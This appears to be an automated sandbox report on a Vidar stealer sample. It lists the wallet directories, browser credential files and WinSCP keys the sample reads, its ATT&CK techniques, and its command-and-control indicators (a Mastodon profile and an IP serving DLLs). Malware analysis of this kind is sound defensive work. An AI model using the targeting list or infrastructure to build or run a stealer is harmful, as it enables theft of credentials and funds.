                        Source: Yara matchFile source: 1.3.T6zZFfRLqs.exe.2330000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.397914082.00000000021F0000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.361677453.0000000002330000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: T6zZFfRLqs.exe PID: 6576, type: MEMORYSTR
                        Tries to steal Crypto Currency WalletsShow sources
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\?i??
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\?i??
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\?????i
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\?????i
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?????
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?????
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?????
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?????
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                        Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398466099.000000000309E000.00000004.00000001.sdmpString found in binary or memory: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Wallets\ElectrumLTCxtNT
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398466099.000000000309E000.00000004.00000001.sdmpString found in binary or memory: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Wallets\ElectronCashtxtO
                        Source: T6zZFfRLqs.exeString found in binary or memory: JaxxLiberty
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\window-state.jsonw
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.seco01]
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398466099.000000000309E000.00000004.00000001.sdmpString found in binary or memory: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Wallets\ElectrumLTCxtNT
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?????
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystoreb
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398466099.000000000309E000.00000004.00000001.sdmpString found in binary or memory: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Wallets\ExodusENT
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystoreb
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398466099.000000000309E000.00000004.00000001.sdmpString found in binary or memory: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Wallets\MultiDogeENTCURRENTr
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.seco01]
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystoreb
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\?i??'
                        Tries to harvest and steal browser information (history, passwords, etc)Show sources
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: Yara matchFile source: 00000001.00000002.397797115.00000000007E2000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: T6zZFfRLqs.exe PID: 6576, type: MEMORYSTR

                        Remote Access Functionality:

                        barindex
                        Yara detected VidarShow sources
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Yara detected Vidar stealerShow sources
                        Source: Yara matchFile source: 1.2.T6zZFfRLqs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.T6zZFfRLqs.exe.21f0e50.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.T6zZFfRLqs.exe.21f0e50.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.3.T6zZFfRLqs.exe.2330000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.T6zZFfRLqs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.3.T6zZFfRLqs.exe.2330000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.397914082.00000000021F0000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.361677453.0000000002330000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: T6zZFfRLqs.exe PID: 6576, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsWindows Management Instrumentation1Application Shimming1Application Shimming1Disable or Modify Tools1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection11Deobfuscate/Decode Files or Information1Credentials in Registry1Account Discovery1Remote Desktop ProtocolData from Local System3Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery4SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing23NTDSSystem Information Discovery56Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsSecurity Software Discovery21SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsVirtualization/Sandbox Evasion1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion1DCSyncProcess Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection11Proc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        T6zZFfRLqs.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\ProgramData\freebl3.dll0%MetadefenderBrowse
                        C:\ProgramData\freebl3.dll0%ReversingLabs
                        C:\ProgramData\mozglue.dll3%MetadefenderBrowse
                        C:\ProgramData\mozglue.dll0%ReversingLabs
                        C:\ProgramData\msvcp140.dll0%MetadefenderBrowse
                        C:\ProgramData\msvcp140.dll0%ReversingLabs
                        C:\ProgramData\nss3.dll0%MetadefenderBrowse
                        C:\ProgramData\nss3.dll0%ReversingLabs
                        C:\ProgramData\softokn3.dll0%MetadefenderBrowse
                        C:\ProgramData\softokn3.dll0%ReversingLabs
                        C:\ProgramData\vcruntime140.dll0%MetadefenderBrowse
                        C:\ProgramData\vcruntime140.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\mozglue[1].dll3%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\mozglue[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\softokn3[1].dll0%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\softokn3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dll0%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dll0%ReversingLabs

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        1.2.T6zZFfRLqs.exe.21f0e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                        1.3.T6zZFfRLqs.exe.2330000.0.unpack100%AviraTR/Patched.Ren.GenDownload File

                        Domains

                        SourceDetectionScannerLabelLink
                        mas.to0%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        http://23.88.105.196/nss3.dll0%Avira URL Cloudsafe
                        http://ocsp.thawte.com00%URL Reputationsafe
                        http://www.mozilla.com00%URL Reputationsafe
                        http://23.88.105.196/freebl3.dll0%Avira URL Cloudsafe
                        https://mas.to0%Avira URL Cloudsafe
                        http://23.88.105.196/mozglue.dll$0%Avira URL Cloudsafe
                        https://mas.to/users/killern00%Avira URL Cloudsafe
                        http://23.88.105.196/msvcp140.dll0%Avira URL Cloudsafe
                        https://mas.to/users/killern0/following0%Avira URL Cloudsafe
                        http://23.88.105.196/mozglue.dll0%Avira URL Cloudsafe
                        http://23.88.105.196/softokn3.dll0%Avira URL Cloudsafe
                        https://mas.to/avatars/original/missing.png0%Avira URL Cloudsafe
                        http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                        http://23.88.105.196/vcruntime140.dll0%Avira URL Cloudsafe
                        https://mas.to/0%Avira URL Cloudsafe
                        https://media.mas.to/masto-public/site_uploads/files/000/000/003/original/elephant_ui_plane-e3f2d57c0%Avira URL Cloudsafe
                        http://23.88.105.196/0%Avira URL Cloudsafe
                        http://23.88.105.196/nss3.dllO0%Avira URL Cloudsafe
                        http://23.88.105.196/10080%Avira URL Cloudsafe
                        http://service.real.cop0%Avira URL Cloudsafe
                        https://mas.to/users/killern0/followers0%Avira URL Cloudsafe
                        https://media.mas.to0%Avira URL Cloudsafe
                        https://mas.to/@killern00%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        mas.to
                        		88.99.75.82
                        		truefalseunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://23.88.105.196/nss3.dllfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://23.88.105.196/freebl3.dllfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://23.88.105.196/msvcp140.dllfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://23.88.105.196/mozglue.dllfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://23.88.105.196/softokn3.dllfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://23.88.105.196/vcruntime140.dllfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://23.88.105.196/false
                        • Avira URL Cloud: safe
                        		unknown
                        http://23.88.105.196/1008false
                        • Avira URL Cloud: safe
                        		unknown
                        https://mas.to/@killern0false
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabtemp.1.drfalse
                          		high
                          http://www.mozilla.com/en-US/blocklist/mozglue[1].dll.1.drfalse
                            		high
                            https://duckduckgo.com/ac/?q=temp.1.drfalse
                              		high
                              https://support.google.com/chrome/?p=plugin_wmpT6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmpfalse
                                		high
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icotemp.1.drfalse
                                  		high
                                  https://support.google.com/chrome/?p=pluginT6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmpfalse
                                    		high
                                    http://ocsp.thawte.com0nss3[1].dll.1.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.mozilla.com0nss3[1].dll.1.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=temp.1.drfalse
                                      		high
                                      https://mas.toT6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchtemp.1.drfalse
                                        		high
                                        http://23.88.105.196/mozglue.dll$T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://mas.to/users/killern0T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://github.com/tootsuite/mastodonT6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmpfalse
                                          		high
                                          https://joinmastodon.org/appsT6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmpfalse
                                            		high
                                            https://ac.ecosia.org/autocomplete?q=temp.1.drfalse
                                              		high
                                              https://support.google.com/chrome/?p=plugin_realT6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmpfalse
                                                		high
                                                https://mas.to/users/killern0/followingT6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://mas.to/avatars/original/missing.pngT6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://crl.thawte.com/ThawteTimestampingCA.crl0nss3[1].dll.1.drfalse
                                                  		high
                                                  http://www.interoperabilitybridges.com/wmp-extension-for-chromeT6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://mas.to/T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://media.mas.to/masto-public/site_uploads/files/000/000/003/original/elephant_ui_plane-e3f2d57cT6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://duckduckgo.com/chrome_newtabSQLitetemp.1.drfalse
                                                    		high
                                                    http://23.88.105.196/nss3.dllOT6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://service.real.copT6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://forms.real.com/real/realone/download.html?type=rpsp_usT6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=temp.1.drfalse
                                                        		high
                                                        https://mas.to/users/killern0/followersT6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://media.mas.toT6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://download.divx.com/plpT6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=temp.1.drfalse
                                                            		high

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            88.99.75.82
                                                            		mas.toGermany
                                                            		24940HETZNER-ASDEfalse
                                                            23.88.105.196
                                                            		unknownUnited States
                                                            		18978ENZUINC-USfalse

                                                            Private

                                                            IP
                                                            192.168.2.1

                                                            General Information

                                                            Joe Sandbox Version:33.0.0 White Diamond
                                                            Analysis ID:491601
                                                            Start date:27.09.2021
                                                            Start time:18:31:58
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 8m 53s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:light
                                                            Sample file name:T6zZFfRLqs.exe
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:24
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@8/18@1/3
                                                            EGA Information:Failed
                                                            HDC Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 89%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found application associated with file extension: .exe
                                                            Warnings:
                                                            Show All
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                            • TCP Packets have been reduced to 100
                                                            • Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.50.102.62, 23.0.174.200, 23.0.174.185, 20.54.110.249, 40.112.88.60, 20.82.210.154, 23.10.249.43, 23.10.249.26, 95.100.54.203
                                                            • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            No simulations

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            88.99.75.82nY67wl47QZ.exeGet hashmaliciousBrowse
                                                              OfE705GyPZ.exeGet hashmaliciousBrowse
                                                                W7fb1ECIQA.exeGet hashmaliciousBrowse
                                                                  R9LbEnIk0s.exeGet hashmaliciousBrowse
                                                                    7XmWGse79x.exeGet hashmaliciousBrowse
                                                                      m5W1BZQU4m.exeGet hashmaliciousBrowse
                                                                        hHsIHUGICB.exeGet hashmaliciousBrowse
                                                                          NOgYb2fHbO.exeGet hashmaliciousBrowse
                                                                            VwDvbAowp0.exeGet hashmaliciousBrowse
                                                                              lXy3MnXJ83.exeGet hashmaliciousBrowse
                                                                                SebwAujas5.exeGet hashmaliciousBrowse
                                                                                  nxW9yUgdYM.exeGet hashmaliciousBrowse
                                                                                    cxBR3cCGTw.exeGet hashmaliciousBrowse
                                                                                      k5THcVgINl.exeGet hashmaliciousBrowse
                                                                                        b2i2IopgOC.exeGet hashmaliciousBrowse
                                                                                          G2BPn4a7o1.exeGet hashmaliciousBrowse
                                                                                            qOsCIQD1uR.exeGet hashmaliciousBrowse
                                                                                              NC7bm1PoKj.exeGet hashmaliciousBrowse
                                                                                                p0FDRanFUE.exeGet hashmaliciousBrowse
                                                                                                  Tt5xbxWwsb.exeGet hashmaliciousBrowse

                                                                                                    Domains

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                    mas.tonY67wl47QZ.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    OfE705GyPZ.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    W7fb1ECIQA.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    R9LbEnIk0s.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    7XmWGse79x.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    m5W1BZQU4m.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    hHsIHUGICB.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    NOgYb2fHbO.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    VwDvbAowp0.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    lXy3MnXJ83.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    SebwAujas5.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    nxW9yUgdYM.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    cxBR3cCGTw.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    k5THcVgINl.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    b2i2IopgOC.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    G2BPn4a7o1.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    qOsCIQD1uR.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    NC7bm1PoKj.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    p0FDRanFUE.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    Tt5xbxWwsb.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82

                                                                                                    ASN

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                    HETZNER-ASDEnY67wl47QZ.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    OfE705GyPZ.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    W7fb1ECIQA.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    R9LbEnIk0s.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    qOthJCpJ8E.exeGet hashmaliciousBrowse
                                                                                                    • 135.181.211.109
                                                                                                    7XmWGse79x.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    m5W1BZQU4m.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    hHsIHUGICB.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    NOgYb2fHbO.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    vKTd7I2OdfBzkW2.exeGet hashmaliciousBrowse
                                                                                                    • 136.243.159.53
                                                                                                    VwDvbAowp0.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    lXy3MnXJ83.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    SebwAujas5.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    nxW9yUgdYM.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    Ov3tXE6rdw.exeGet hashmaliciousBrowse
                                                                                                    • 168.119.93.163
                                                                                                    cxBR3cCGTw.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    Confirmation de cdeclient_5045009.xlsxGet hashmaliciousBrowse
                                                                                                    • 168.119.93.163
                                                                                                    KI7JhXnhm9.exeGet hashmaliciousBrowse
                                                                                                    • 136.243.159.53
                                                                                                    k5THcVgINl.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    b2i2IopgOC.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    ENZUINC-USnY67wl47QZ.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    OfE705GyPZ.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    W7fb1ECIQA.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    R9LbEnIk0s.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    7XmWGse79x.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    m5W1BZQU4m.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    hHsIHUGICB.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    NOgYb2fHbO.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
